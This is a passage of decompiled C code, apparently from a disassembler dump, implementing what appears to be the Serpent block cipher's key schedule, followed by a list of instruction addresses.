				signed int _t1473;
				void* _t1480;

				_t1133 = __edx;
				_t792 = _a8;
				_t2 = _t792 + 0x1f; // 0x21
				_t566 = _t2 >> 5;
				_t1289 = 0;
				if(_t566 > 0) {
					_t791 = memcpy(__edx, _a4, _t566 << 2);
					_t1480 = _t1480 + 0xc;
					_t1289 = _t791;
				}
				if(_t792 < 0x100) {
					_t1125 = 8;
					if(_t1289 < _t1125) {
						memset(_t1133 + _t1289 * 4, 0, _t1125 - _t1289 << 2);
					}
					_t788 = 1 << (_t792 & 0x0000001f);
					_t1128 = _t1133 + (_t792 >> 5) * 4;
					_t10 = _t788 - 1; // 0x0
					 *_t1128 = _t10 &  *(_t1133 + (_t792 >> 5) * 4) | 1 << (_t792 & 0x0000001f);
				}
				_t935 = 0;
				_t567 = _t1133 + 0x14;
				do {
					_t1293 =  *(_t567 - 0x14) ^  *(_t567 - 8) ^ _t567[2] ^  *_t567;
					_t567 =  &(_t567[1]);
					asm("rol esi, 0xb");
					_t567[2] = _t1293 ^ _t935 ^ 0x9e3779b9;
					_t935 = _t935 + 1;
				} while (_t935 < 0x84);
				_t793 =  *(_t1133 + 0x20);
				_t936 =  *(_t1133 + 0x2c);
				_t1296 =  *(_t1133 + 0x28);
				_t569 =  *(_t1133 + 0x24) & _t793;
				_a8 = _t1296;
				_t1135 = _t936 | _t793;
				_t794 =  *(_t1133 + 0x24);
				_t1298 = (_t1296 ^ _t793) & _t1135;
				_a4 = _t569;
				_t939 = (_t936 & _t793 | _t794) ^ _t1298;
				_t573 = (_t569 | _a8) ^ _t1298 ^  *(_t1133 + 0x2c) ^ _t794;
				 *(_t1133 + 0x2c) = _t573;
				_t1302 = _t573 & _t1135 ^ _a4 ^ _a8;
				 *(_t1133 + 0x24) = _t939;
				_t575 =  !( *(_t1133 + 0x30));
				 *(_t1133 + 0x28) = _t1302;
				_t941 =  *(_t1133 + 0x3c) ^  *(_t1133 + 0x34);
				 *(_t1133 + 0x20) =  !_t1302 & _t939 ^ _a4 ^ _t1135;
				_t800 =  *(_t1133 + 0x38);
				_a4 = _t941;
				_t1138 = _t575 & _t800 ^ _t941;
				_t1305 = _t575 ^ _t800;
				_t944 = (_t1138 ^ _t800) &  *(_t1133 + 0x34);
				_a8 = _t944 ^ _t1305;
				_t803 =  *(_t1133 + 0x3c);
				_t947 = (_t944 | _t803) & (_t1305 | _t1138) ^  *(_t1133 + 0x30);
				_t1307 = _a8;
				_t804 =  *(_t1133 + 0x4c);
				 *(_t1133 + 0x34) = (_t575 | _t803) ^ _a4 ^ _t947 ^ _t1307;
				 *(_t1133 + 0x30) = _t1138;
				_t1139 =  *(_t1133 + 0x40);
				 *(_t1133 + 0x3c) = _t1307;
				_t1308 =  *(_t1133 + 0x44);
				 *(_t1133 + 0x38) = _t947;
				_a4 = _t804 ^ _t1139;
				_t583 = _t804 ^ _t1308;
				_t949 =  !( *(_t1133 + 0x48));
				_t1311 = _t1308 & _t1139 ^ _t949 ^ _t583;
				_a8 = _t949 |  *(_t1133 + 0x44);
				_t1143 = (_t583 ^  *(_t1133 + 0x40)) & (_t1311 | _t804) ^ _a8;
				_t955 = _t1143 ^ _t804 ^  *(_t1133 + 0x48);
				_t956 =  *(_t1133 + 0x54);
				 *(_t1133 + 0x4c) = (_t583 | _a4) ^ _t955;
				_t586 =  *(_t1133 + 0x5c);
				 *(_t1133 + 0x48) = _t1311;
				 *(_t1133 + 0x44) = _t1143;
				_a4 = _t586 ^ _t956;
				_t1315 =  *(_t1133 + 0x58) ^ _t956;
				 *(_t1133 + 0x40) = (_a4 | _t1311) ^ _t955 ^ _a8;
				_t809 =  *(_t1133 + 0x50);
				_t587 = _t586 | _t809;
				_v8 = _t587;
				_a8 = _t956;
				_t957 = _t956 ^ _t809;
				_t1146 = _t1315 ^ _t587;
				_t812 =  *(_t1133 + 0x50);
				_t591 = (_t957 &  *(_t1133 + 0x58) |  !_a4) ^ (_t1315 | _t812);
				_t961 = _t957 & _a4 ^ _t591 ^ _t1146 ^ _t812;
				_t813 =  *(_t1133 + 0x6c);
				 *(_t1133 + 0x50) = _t591;
				 *(_t1133 + 0x54) = _t961;
				_t962 =  *(_t1133 + 0x64);
				 *(_t1133 + 0x58) = (_t591 | _t961) & _v8 ^ _a8;
				_t595 =  *(_t1133 + 0x68);
				_t1318 =  !_t595;
				_a4 = _t595 ^ _t962;
				_v8 = _t1318;
				_t1319 = _t1318 | _t962;
				 *(_t1133 + 0x5c) = _t1146;
				_t598 = _t1319 ^ _t813;
				_t964 = _t598 &  *(_t1133 + 0x60);
				_a8 = _t964 ^ _a4;
				_t1154 = (_t964 ^  *(_t1133 + 0x64) | _a4) ^ _t813 ^  *(_t1133 + 0x60);
				_t965 = _t964 ^ _t1154;
				_t816 = _t965 & _a8 ^ _t1319 &  *(_t1133 + 0x6c);
				_t1321 =  *(_t1133 + 0x78);
				 *(_t1133 + 0x64) = _t1154;
				_t1155 =  *(_t1133 + 0x70);
				 *(_t1133 + 0x60) = (_t598 | _v8) ^ _t965 ^ _t816;
				_t967 = _t1321 ^ _t1155;
				_a8 = _t1155;
				 *(_t1133 + 0x6c) = _a8;
				_t603 =  *(_t1133 + 0x7c);
				 *(_t1133 + 0x68) = _t816;
				_t817 =  *(_t1133 + 0x74);
				_t1157 = _t1321 ^ _t817;
				_v12 = _t967;
				_t968 = _t967 ^ _t603;
				_v16 = _t1157;
				_a4 = _t1321 | _t817;
				_v8 =  !_t1157;
				_t969 = _t968 ^ _v8;
				_t1325 = _t968 & _a4 ^ (_t603 | _t817);
				_t1162 = _a4 & _v12;
				 *(_t1133 + 0x74) = _t603 & _a8 ^ _v8;
				_t970 =  *(_t1133 + 0x80);
				 *(_t1133 + 0x7c) = _t1325;
				_t1326 =  *(_t1133 + 0x84);
				_a8 = _t1326;
				_t1327 = _t1326 ^ _t970;
				 *(_t1133 + 0x70) = _t1162 & _t1325 ^ _t969;
				_t821 =  *(_t1133 + 0x8c);
				 *(_t1133 + 0x78) = (_t1162 ^ _v16 | _t1325) ^ _t969;
				_t1167 =  !_t970;
				_t610 = (_t821 ^ _t970 | _t1327) ^ _t1167 ^  *(_t1133 + 0x88);
				_t972 =  !_t821;
				_a4 = _t972;
				_t974 = _t972 & _t610 ^ _t1327;
				 *(_t1133 + 0x84) = _t974;
				_t1331 = (_t610 |  *(_t1133 + 0x88)) ^ (_t974 | _a8) ^ _a4;
				_t824 =  *(_t1133 + 0x94);
				 *(_t1133 + 0x80) = _t610;
				 *(_t1133 + 0x88) = (_t610 | _t1331) ^ (_t974 |  *(_t1133 + 0x8c)) ^ _t1167;
				_t614 =  *(_t1133 + 0x90);
				 *(_t1133 + 0x8c) = _t1331;
				_t977 = _t824 ^ _t614;
				_t1333 =  *(_t1133 + 0x9c) ^ _t614;
				_v16 = _t977;
				_a8 = _t614;
				_t980 = (_t977 | _t1333) ^  !_t614 ^  *(_t1133 + 0x98);
				_t617 =  !_t980;
				_t1169 = _t617 | _t824;
				_a4 = _t1169;
				_t1170 = _t1169 ^ _t1333;
				 *(_t1133 + 0x90) = _t980;
				_t1337 = (_t1170 ^ _t824) & _a4 ^ _t980 & _a8;
				_t827 =  *(_t1133 + 0xa0);
				_t983 =  *(_t1133 + 0xac);
				 *(_t1133 + 0x98) = _t1337;
				_t1338 =  *(_t1133 + 0xa8);
				 *(_t1133 + 0x94) = (_t617 | _a8) ^ _t1337 & _t1170 ^ _v16;
				_t622 =  *(_t1133 + 0xa4) & _t827;
				_a8 = _t1338;
				_a4 = _t622;
				 *(_t1133 + 0x9c) = _t1170;
				_t1172 = _t983 | _t827;
				_t828 =  *(_t1133 + 0xa4);
				_t1340 = (_t1338 ^ _t827) & _t1172;
				_t986 = (_t983 & _t827 | _t828) ^ _t1340;
				_t626 = (_t622 | _a8) ^ _t1340 ^  *(_t1133 + 0xac) ^ _t828;
				 *(_t1133 + 0xa4) = _t986;
				_t1344 = _t1172 & _t626 ^ _a4 ^ _a8;
				 *(_t1133 + 0xac) = _t626;
				 *(_t1133 + 0xa8) = _t1344;
				_t988 =  *(_t1133 + 0xbc) ^  *(_t1133 + 0xb4);
				 *(_t1133 + 0xa0) =  !_t1344 & _t986 ^ _a4 ^ _t1172;
				_t834 =  *(_t1133 + 0xb8);
				_t628 =  !( *(_t1133 + 0xb0));
				_t1175 = _t628 & _t834 ^ _t988;
				_a4 = _t988;
				_t1348 = (_t1175 ^ _t834) &  *(_t1133 + 0xb4);
				_t990 = _t628 ^ _t834;
				_a8 = _t1348 ^ _t990;
				_t837 =  *(_t1133 + 0xbc);
				_t993 = (_t990 | _t1175) & (_t1348 | _t837) ^  *(_t1133 + 0xb0);
				 *(_t1133 + 0xb0) = _t1175;
				_t1350 = _a8;
				_t838 =  *(_t1133 + 0xcc);
				_t1176 =  *(_t1133 + 0xc0);
				 *(_t1133 + 0xb4) = (_t628 | _t837) ^ _a4 ^ _t993 ^ _t1350;
				 *(_t1133 + 0xb8) = _t993;
				_a4 = _t838 ^ _t1176;
				 *(_t1133 + 0xbc) = _t1350;
				_t1351 =  *(_t1133 + 0xc4);
				_t995 =  !( *(_t1133 + 0xc8));
				_t636 = _t838 ^ _t1351;
				_t1354 = _t1351 & _t1176 ^ _t995 ^ _t636;
				_a8 = _t995 |  *(_t1133 + 0xc4);
				_t1180 = (_t636 ^  *(_t1133 + 0xc0)) & (_t1354 | _t838) ^ _a8;
				_t1001 = _t1180 ^ _t838 ^  *(_t1133 + 0xc8);
				_t1002 =  *(_t1133 + 0xd4);
				 *(_t1133 + 0xcc) = (_t636 | _a4) ^ _t1001;
				_t639 =  *(_t1133 + 0xdc);
				 *(_t1133 + 0xc8) = _t1354;
				_a4 = _t639 ^ _t1002;
				 *(_t1133 + 0xc4) = _t1180;
				 *(_t1133 + 0xc0) = (_a4 | _t1354) ^ _t1001 ^ _a8;
				_t843 =  *(_t1133 + 0xd0);
				_t640 = _t639 | _t843;
				_t1358 =  *(_t1133 + 0xd8) ^ _t1002;
				_a8 = _t1002;
				_t1003 = _t1002 ^ _t843;
				_v8 = _t640;
				_t1183 = _t1358 ^ _t640;
				_t846 =  *(_t1133 + 0xd0);
				_t644 = (_t1003 &  *(_t1133 + 0xd8) |  !_a4) ^ (_t1358 | _t846);
				_t1007 = _t1003 & _a4 ^ _t644 ^ _t1183 ^ _t846;
				_t847 =  *(_t1133 + 0xec);
				 *(_t1133 + 0xd0) = _t644;
				 *(_t1133 + 0xd4) = _t1007;
				_t1008 =  *(_t1133 + 0xe4);
				 *(_t1133 + 0xd8) = (_t644 | _t1007) & _v8 ^ _a8;
				_t648 =  *(_t1133 + 0xe8);
				 *(_t1133 + 0xdc) = _t1183;
				_t1361 =  !_t648;
				_a4 = _t648 ^ _t1008;
				_v16 = _t1361;
				_t1362 = _t1361 | _t1008;
				_t651 = _t1362 ^ _t847;
				_t1010 = _t651 &  *(_t1133 + 0xe0);
				_a8 = _t1010 ^ _a4;
				_t1191 = (_t1010 ^  *(_t1133 + 0xe4) | _a4) ^ _t847 ^  *(_t1133 + 0xe0);
				_t1011 = _t1010 ^ _t1191;
				 *(_t1133 + 0xe4) = _t1191;
				_t1192 =  *(_t1133 + 0xf0);
				_t850 = _t1011 & _a8 ^ _t1362 &  *(_t1133 + 0xec);
				_t1364 =  *(_t1133 + 0xf8);
				 *(_t1133 + 0xe0) = (_t651 | _v16) ^ _t1011 ^ _t850;
				_a8 = _t1192;
				_t1013 = _t1364 ^ _t1192;
				 *(_t1133 + 0xe8) = _t850;
				_t851 =  *(_t1133 + 0xf4);
				_t1194 = _t1364 ^ _t851;
				 *(_t1133 + 0xec) = _a8;
				_t656 =  *(_t1133 + 0xfc);
				_v12 = _t1194;
				_v8 =  !_t1194;
				_v16 = _t1013;
				_t1014 = _t1013 ^ _t656;
				_a4 = _t1364 | _t851;
				_t1015 = _t1014 ^ _v8;
				_t1368 = _t1014 & _a4 ^ (_t656 | _t851);
				_t1199 = _a4 & _v16;
				 *(_t1133 + 0xf4) = _t656 & _a8 ^ _v8;
				_t1016 =  *(_t1133 + 0x100);
				 *(_t1133 + 0xf0) = _t1199 & _t1368 ^ _t1015;
				_t855 =  *(_t1133 + 0x10c);
				 *(_t1133 + 0xfc) = _t1368;
				_t1369 =  *(_t1133 + 0x104);
				 *(_t1133 + 0xf8) = (_t1199 ^ _v12 | _t1368) ^ _t1015;
				_a8 = _t1369;
				_t1370 = _t1369 ^ _t1016;
				_t1204 =  !_t1016;
				_t663 = (_t855 ^ _t1016 | _t1370) ^ _t1204 ^  *(_t1133 + 0x108);
				_t1018 =  !_t855;
				_a4 = _t1018;
				_t1020 = _t1018 & _t663 ^ _t1370;
				 *(_t1133 + 0x100) = _t663;
				_t1374 = (_t663 |  *(_t1133 + 0x108)) ^ (_t1020 | _a8) ^ _a4;
				_t858 =  *(_t1133 + 0x114);
				 *(_t1133 + 0x104) = _t1020;
				 *(_t1133 + 0x10c) = _t1374;
				 *(_t1133 + 0x108) = (_t663 | _t1374) ^ (_t1020 |  *(_t1133 + 0x10c)) ^ _t1204;
				_t667 =  *(_t1133 + 0x110);
				_t1376 =  *(_t1133 + 0x11c) ^ _t667;
				_a8 = _t667;
				_t1023 = _t858 ^ _t667;
				_v16 = _t1023;
				_t1026 = (_t1023 | _t1376) ^  !_t667 ^  *(_t1133 + 0x118);
				_t670 =  !_t1026;
				_t1206 = _t670 | _t858;
				_a4 = _t1206;
				_t1207 = _t1206 ^ _t1376;
				 *(_t1133 + 0x110) = _t1026;
				_t1380 = (_t1207 ^ _t858) & _a4 ^ _t1026 & _a8;
				_t861 =  *(_t1133 + 0x120);
				_t1029 =  *(_t1133 + 0x12c);
				 *(_t1133 + 0x114) = (_t670 | _a8) ^ _t1380 & _t1207 ^ _v16;
				_t675 =  *(_t1133 + 0x124) & _t861;
				 *(_t1133 + 0x118) = _t1380;
				_t1381 =  *(_t1133 + 0x128);
				_a8 = _t1381;
				_a4 = _t675;
				 *(_t1133 + 0x11c) = _t1207;
				_t1209 = _t1029 | _t861;
				_t1383 = (_t1381 ^ _t861) & _t1209;
				_t862 =  *(_t1133 + 0x124);
				_t1032 = (_t1029 & _t861 | _t862) ^ _t1383;
				_t679 = (_t675 | _a8) ^ _t1383 ^  *(_t1133 + 0x12c) ^ _t862;
				 *(_t1133 + 0x12c) = _t679;
				_t1387 = _t1209 & _t679 ^ _a4 ^ _a8;
				 *(_t1133 + 0x124) = _t1032;
				 *(_t1133 + 0x120) =  !_t1387 & _t1032 ^ _a4 ^ _t1209;
				 *(_t1133 + 0x128) = _t1387;
				_t868 =  *(_t1133 + 0x138);
				_t1034 =  *(_t1133 + 0x13c) ^  *(_t1133 + 0x134);
				_t681 =  !( *(_t1133 + 0x130));
				_t1212 = _t681 & _t868 ^ _t1034;
				_a4 = _t1034;
				_t1036 = _t681 ^ _t868;
				_t1391 = (_t1212 ^ _t868) &  *(_t1133 + 0x134);
				_a8 = _t1391 ^ _t1036;
				_t871 =  *(_t1133 + 0x13c);
				_t1039 = (_t1036 | _t1212) & (_t1391 | _t871) ^  *(_t1133 + 0x130);
				_t1393 = _a8;
				_t872 =  *(_t1133 + 0x14c);
				 *(_t1133 + 0x134) = (_t681 | _t871) ^ _a4 ^ _t1039 ^ _t1393;
				 *(_t1133 + 0x130) = _t1212;
				_t1213 =  *(_t1133 + 0x140);
				 *(_t1133 + 0x138) = _t1039;
				_a4 = _t872 ^ _t1213;
				 *(_t1133 + 0x13c) = _t1393;
				_t1394 =  *(_t1133 + 0x144);
				_t689 = _t872 ^ _t1394;
				_t1041 =  !( *(_t1133 + 0x148));
				_t1397 = _t1394 & _t1213 ^ _t1041 ^ _t689;
				_a8 = _t1041 |  *(_t1133 + 0x144);
				_t1217 = (_t689 ^  *(_t1133 + 0x140)) & (_t1397 | _t872) ^ _a8;
				_t1047 = _t1217 ^ _t872 ^  *(_t1133 + 0x148);
				 *(_t1133 + 0x14c) = (_t689 | _a4) ^ _t1047;
				_t692 =  *(_t1133 + 0x15c);
				_t1048 =  *(_t1133 + 0x154);
				 *(_t1133 + 0x148) = _t1397;
				 *(_t1133 + 0x144) = _t1217;
				_a4 = _t692 ^ _t1048;
				 *(_t1133 + 0x140) = (_a4 | _t1397) ^ _t1047 ^ _a8;
				_t877 =  *(_t1133 + 0x150);
				_t693 = _t692 | _t877;
				_t1401 =  *(_t1133 + 0x158) ^ _t1048;
				_t1220 = _t1401 ^ _t693;
				_a8 = _t1048;
				_t1049 = _t1048 ^ _t877;
				_v8 = _t693;
				_t880 =  *(_t1133 + 0x150);
				_t697 = (_t1049 &  *(_t1133 + 0x158) |  !_a4) ^ (_t1401 | _t880);
				_t1053 = _t1049 & _a4 ^ _t697 ^ _t1220 ^ _t880;
				_t881 =  *(_t1133 + 0x16c);
				 *(_t1133 + 0x150) = _t697;
				 *(_t1133 + 0x154) = _t1053;
				_t1054 =  *(_t1133 + 0x164);
				 *(_t1133 + 0x158) = (_t697 | _t1053) & _v8 ^ _a8;
				_t701 =  *(_t1133 + 0x168);
				 *(_t1133 + 0x15c) = _t1220;
				_t1404 =  !_t701;
				_v16 = _t1404;
				_t1405 = _t1404 | _t1054;
				_a4 = _t701 ^ _t1054;
				_t704 = _t1405 ^ _t881;
				_t1056 = _t704 &  *(_t1133 + 0x160);
				_a8 = _t1056 ^ _a4;
				_t1228 = (_t1056 ^  *(_t1133 + 0x164) | _a4) ^ _t881 ^  *(_t1133 + 0x160);
				_t1057 = _t1056 ^ _t1228;
				_t884 = _t1057 & _a8 ^ _t1405 &  *(_t1133 + 0x16c);
				_t1407 =  *(_t1133 + 0x178);
				 *(_t1133 + 0x164) = _t1228;
				_t1229 =  *(_t1133 + 0x170);
				_t1059 = _t1407 ^ _t1229;
				 *(_t1133 + 0x160) = (_t704 | _v16) ^ _t1057 ^ _t884;
				_a8 = _t1229;
				 *(_t1133 + 0x168) = _t884;
				_t885 =  *(_t1133 + 0x174);
				_t1231 = _t1407 ^ _t885;
				_v12 = _t1231;
				 *(_t1133 + 0x16c) = _a8;
				_t709 =  *(_t1133 + 0x17c);
				_v16 = _t1059;
				_v8 =  !_t1231;
				_a4 = _t1407 | _t885;
				_t1060 = _t1059 ^ _t709;
				_t1061 = _t1060 ^ _v8;
				_t1411 = _t1060 & _a4 ^ (_t709 | _t885);
				_t1236 = _a4 & _v16;
				 *(_t1133 + 0x170) = _t1236 & _t1411 ^ _t1061;
				_t889 =  *(_t1133 + 0x18c);
				_t1062 =  *(_t1133 + 0x180);
				 *(_t1133 + 0x174) = _t709 & _a8 ^ _v8;
				 *(_t1133 + 0x17c) = _t1411;
				_t1412 =  *(_t1133 + 0x184);
				_a8 = _t1412;
				_t1413 = _t1412 ^ _t1062;
				 *(_t1133 + 0x178) = (_t1236 ^ _v12 | _t1411) ^ _t1061;
				_t1241 =  !_t1062;
				_t716 = (_t889 ^ _t1062 | _t1413) ^ _t1241 ^  *(_t1133 + 0x188);
				_t1064 =  !_t889;
				_a4 = _t1064;
				_t1066 = _t1064 & _t716 ^ _t1413;
				 *(_t1133 + 0x180) = _t716;
				_t1417 = (_t716 |  *(_t1133 + 0x188)) ^ (_t1066 | _a8) ^ _a4;
				_t892 =  *(_t1133 + 0x194);
				 *(_t1133 + 0x184) = _t1066;
				 *(_t1133 + 0x18c) = _t1417;
				 *(_t1133 + 0x188) = (_t716 | _t1417) ^ (_t1066 |  *(_t1133 + 0x18c)) ^ _t1241;
				_t720 =  *(_t1133 + 0x190);
				_t1419 =  *(_t1133 + 0x19c) ^ _t720;
				_a8 = _t720;
				_t1069 = _t892 ^ _t720;
				_v16 = _t1069;
				_t1072 = (_t1069 | _t1419) ^  !_t720 ^  *(_t1133 + 0x198);
				_t723 =  !_t1072;
				_t1243 = _t723 | _t892;
				_a4 = _t1243;
				_t1244 = _t1243 ^ _t1419;
				 *(_t1133 + 0x190) = _t1072;
				_t1423 = (_t1244 ^ _t892) & _a4 ^ _t1072 & _a8;
				 *(_t1133 + 0x19c) = _t1244;
				 *(_t1133 + 0x194) = (_t723 | _a8) ^ _t1423 & _t1244 ^ _v16;
				 *(_t1133 + 0x198) = _t1423;
				_t1075 =  *(_t1133 + 0x1ac);
				_t895 =  *(_t1133 + 0x1a0);
				_t1424 =  *(_t1133 + 0x1a8);
				_t1246 = _t1075 | _t895;
				_t728 =  *(_t1133 + 0x1a4) & _t895;
				_a8 = _t1424;
				_a4 = _t728;
				_t896 =  *(_t1133 + 0x1a4);
				_t1426 = (_t1424 ^ _t895) & _t1246;
				_t1078 = (_t1075 & _t895 | _t896) ^ _t1426;
				_t732 = (_t728 | _a8) ^ _t1426 ^  *(_t1133 + 0x1ac) ^ _t896;
				_t1430 = _t1246 & _t732 ^ _a4 ^ _a8;
				 *(_t1133 + 0x1a0) =  !_t1430 & _t1078 ^ _a4 ^ _t1246;
				 *(_t1133 + 0x1a4) = _t1078;
				 *(_t1133 + 0x1a8) = _t1430;
				 *(_t1133 + 0x1ac) = _t732;
				_t902 =  *(_t1133 + 0x1b8);
				_t1079 =  *(_t1133 + 0x1bc);
				_a4 = _t1079;
				_t1080 = _t1079 ^  *(_t1133 + 0x1b4);
				_t734 =  !( *(_t1133 + 0x1b0));
				_t1249 = _t734 & _t902 ^ _t1080;
				_v16 = _t1080;
				_t1434 = (_t1249 ^ _t902) &  *(_t1133 + 0x1b4);
				_t1082 = _t734 ^ _t902;
				_t1085 = (_t1082 | _t1249) & (_t1434 | _a4) ^  *(_t1133 + 0x1b0);
				 *(_t1133 + 0x1b0) = _t1249;
				_t1436 = _t1434 ^ _t1082;
				 *(_t1133 + 0x1b4) = (_t734 | _a4) ^ _v16 ^ _t1085 ^ _t1436;
				 *(_t1133 + 0x1b8) = _t1085;
				 *(_t1133 + 0x1bc) = _t1436;
				_t905 =  *(_t1133 + 0x1cc);
				_t1250 =  *(_t1133 + 0x1c0);
				_t1437 =  *(_t1133 + 0x1c4);
				_a4 = _t905 ^ _t1250;
				_t1087 =  !( *(_t1133 + 0x1c8));
				_t742 = _t905 ^ _t1437;
				_t1440 = _t1437 & _t1250 ^ _t1087 ^ _t742;
				_a8 = _t1087 |  *(_t1133 + 0x1c4);
				_t1254 = (_t742 ^  *(_t1133 + 0x1c0)) & (_t1440 | _t905) ^ _a8;
				_t1093 = _t1254 ^ _t905 ^  *(_t1133 + 0x1c8);
				 *(_t1133 + 0x1c0) = (_a4 | _t1440) ^ _t1093 ^ _a8;
				 *(_t1133 + 0x1c4) = _t1254;
				 *(_t1133 + 0x1c8) = _t1440;
				 *(_t1133 + 0x1cc) = (_t742 | _a4) ^ _t1093;
				_t1094 =  *(_t1133 + 0x1d4);
				_t745 =  *(_t1133 + 0x1dc);
				_t910 =  *(_t1133 + 0x1d0);
				_t746 = _t745 | _t910;
				_a4 = _t745 ^ _t1094;
				_t1444 =  *(_t1133 + 0x1d8) ^ _t1094;
				_v8 = _t746;
				_a8 = _t1094;
				_t1095 = _t1094 ^ _t910;
				_t1257 = _t1444 ^ _t746;
				_t913 =  *(_t1133 + 0x1d0);
				_t750 = (_t1095 &  *(_t1133 + 0x1d8) |  !_a4) ^ (_t1444 | _t913);
				 *(_t1133 + 0x1d0) = _t750;
				_t1099 = _t1095 & _a4 ^ _t750 ^ _t1257 ^ _t913;
				 *(_t1133 + 0x1d4) = _t1099;
				 *(_t1133 + 0x1d8) = (_t750 | _t1099) & _v8 ^ _a8;
				 *(_t1133 + 0x1dc) = _t1257;
				_t754 =  *(_t1133 + 0x1e8);
				_t1100 =  *(_t1133 + 0x1e4);
				_t914 =  *(_t1133 + 0x1ec);
				_a4 = _t754 ^ _t1100;
				_t1447 =  !_t754;
				_v16 = _t1447;
				_t1448 = _t1447 | _t1100;
				_t757 = _t1448 ^ _t914;
				_t1102 = _t757 &  *(_t1133 + 0x1e0);
				_a8 = _t1102 ^ _a4;
				_t1265 = (_t1102 ^  *(_t1133 + 0x1e4) | _a4) ^ _t914 ^  *(_t1133 + 0x1e0);
				_t1103 = _t1102 ^ _t1265;
				_t917 = _t1103 & _a8 ^ _t1448 &  *(_t1133 + 0x1ec);
				 *(_t1133 + 0x1e0) = (_t757 | _v16) ^ _t1103 ^ _t917;
				 *(_t1133 + 0x1e4) = _t1265;
				 *(_t1133 + 0x1e8) = _t917;
				 *(_t1133 + 0x1ec) = _a8;
				_t1266 =  *(_t1133 + 0x1f0);
				_t918 =  *(_t1133 + 0x1f4);
				_t1450 =  *(_t1133 + 0x1f8);
				_t762 =  *(_t1133 + 0x1fc);
				_a8 = _t1266;
				_t1105 = _t1450 ^ _t1266;
				_t1268 = _t1450 ^ _t918;
				_v16 = _t1105;
				_t1106 = _t1105 ^ _t762;
				_v12 = _t1268;
				_v8 =  !_t1268;
				_a4 = _t1450 | _t918;
				_t1107 = _t1106 ^ _v8;
				_t1454 = _t1106 & _a4 ^ (_t762 | _t918);
				_t1273 = _a4 & _v16;
				 *(_t1133 + 0x1f0) = _t1273 & _t1454 ^ _t1107;
				 *(_t1133 + 0x1f4) = _t762 & _a8 ^ _v8;
				 *(_t1133 + 0x1f8) = (_t1273 ^ _v12 | _t1454) ^ _t1107;
				 *(_t1133 + 0x1fc) = _t1454;
				_t922 =  *(_t1133 + 0x20c);
				_t1108 =  *(_t1133 + 0x200);
				_t1455 =  *(_t1133 + 0x204);
				_a8 = _t1455;
				_t1456 = _t1455 ^ _t1108;
				_t1278 =  !_t1108;
				_t769 = (_t922 ^ _t1108 | _t1456) ^ _t1278 ^  *(_t1133 + 0x208);
				_t1110 =  !_t922;
				_v16 = _t1110;
				_t1112 = _t1110 & _t769 ^ _t1456;
				_a4 = _t922;
				 *(_t1133 + 0x200) = _t769;
				 *(_t1133 + 0x204) = _t1112;
				_t1460 = (_t769 |  *(_t1133 + 0x208)) ^ (_t1112 | _a8) ^ _v16;
				 *(_t1133 + 0x208) = (_t769 | _t1460) ^ (_t1112 | _a4) ^ _t1278;
				 *(_t1133 + 0x20c) = _t1460;
				_t773 =  *(_t1133 + 0x210);
				_t925 =  *(_t1133 + 0x214);
				_t1462 =  *(_t1133 + 0x21c) ^ _t773;
				_t1115 = _t925 ^ _t773;
				_a8 = _t773;
				_v16 = _t1115;
				_t1118 = (_t1115 | _t1462) ^  !_t773 ^  *(_t1133 + 0x218);
				_t776 =  !_t1118;
				_t1280 = _t776 | _t925;
				_a4 = _t1280;
				_t1281 = _t1280 ^ _t1462;
				 *(_t1133 + 0x210) = _t1118;
				_t1466 = (_t1281 ^ _t925) & _a4 ^ _t1118 & _a8;
				 *(_t1133 + 0x214) = (_t776 | _a8) ^ _t1466 & _t1281 ^ _v16;
				 *(_t1133 + 0x218) = _t1466;
				 *(_t1133 + 0x21c) = _t1281;
				_t928 =  *(_t1133 + 0x220);
				_t1121 =  *(_t1133 + 0x22c);
				_t1467 =  *(_t1133 + 0x228);
				_t781 =  *(_t1133 + 0x224) & _t928;
				_a8 = _t1467;
				_t1283 = _t1121 | _t928;
				_t1469 = (_t1467 ^ _t928) & _t1283;
				_a4 = _t781;
				_t929 =  *(_t1133 + 0x224);
				_t1124 = (_t1121 & _t928 | _t929) ^ _t1469;
				_t785 = (_t781 | _a8) ^ _t1469 ^  *(_t1133 + 0x22c) ^ _t929;
				_t1473 = _t1283 & _t785 ^ _a4 ^ _a8;
				 *(_t1133 + 0x220) =  !_t1473 & _t1124 ^ _a4 ^ _t1283;
				 *(_t1133 + 0x224) = _t1124;
				 *(_t1133 + 0x228) = _t1473;
				 *(_t1133 + 0x22c) = _t785;
				return _t785;
			}

0x0075664c
0x00756653
0x00756656
0x0075665a
0x0075665d
0x00756662
0x0075666b
0x0075666b
0x0075666d
0x0075666d
0x00756675
0x00756679
0x0075667c
0x00756685
0x00756685
0x0075668f
0x00756696
0x00756699
0x007566a0
0x007566a0
0x007566a2
0x007566a4
0x007566a7
0x007566b0
0x007566b2
0x007566bd
0x007566c0
0x007566c3
0x007566c4
0x007566cc
0x007566cf
0x007566d5
0x007566d8
0x007566da
0x007566e3
0x007566e5
0x007566e8
0x007566ea
0x007566f7
0x007566f9
0x00756702
0x00756705
0x00756714
0x0075671c
0x0075671e
0x00756724
0x00756728
0x0075672b
0x0075672e
0x00756733
0x00756737
0x0075673d
0x00756746
0x00756749
0x00756750
0x00756753
0x0075675b
0x00756762
0x00756765
0x00756768
0x0075676f
0x00756772
0x00756775
0x0075677b
0x00756780
0x00756784
0x0075678d
0x00756792
0x0075679e
0x007567a5
0x007567b4
0x007567b7
0x007567ba
0x007567bd
0x007567c4
0x007567ca
0x007567cf
0x007567d1
0x007567d4
0x007567d7
0x007567d9
0x007567dc
0x007567df
0x007567e6
0x007567f4
0x007567f9
0x007567ff
0x00756801
0x00756804
0x0075680c
0x00756812
0x00756815
0x00756818
0x0075681f
0x00756821
0x00756824
0x00756827
0x00756829
0x00756831
0x00756838
0x00756842
0x0075684f
0x00756852
0x0075685b
0x0075685f
0x00756862
0x00756865
0x00756868
0x00756870
0x00756872
0x00756877
0x0075687a
0x0075687d
0x00756880
0x00756883
0x00756887
0x0075688a
0x0075688c
0x0075688f
0x00756894
0x0075689c
0x007568a9
0x007568ae
0x007568b1
0x007568c1
0x007568c7
0x007568ca
0x007568d0
0x007568d3
0x007568d5
0x007568d8
0x007568e4
0x007568e9
0x007568ed
0x007568f5
0x007568f7
0x007568fc
0x0075690b
0x00756919
0x0075691c
0x00756922
0x0075692e
0x00756934
0x0075693a
0x00756948
0x0075694a
0x0075694c
0x0075694f
0x00756958
0x00756960
0x00756967
0x00756969
0x0075696c
0x0075697a
0x00756980
0x00756982
0x00756991
0x00756997
0x0075699d
0x007569a3
0x007569af
0x007569b1
0x007569b6
0x007569bc
0x007569c6
0x007569c8
0x007569ce
0x007569d2
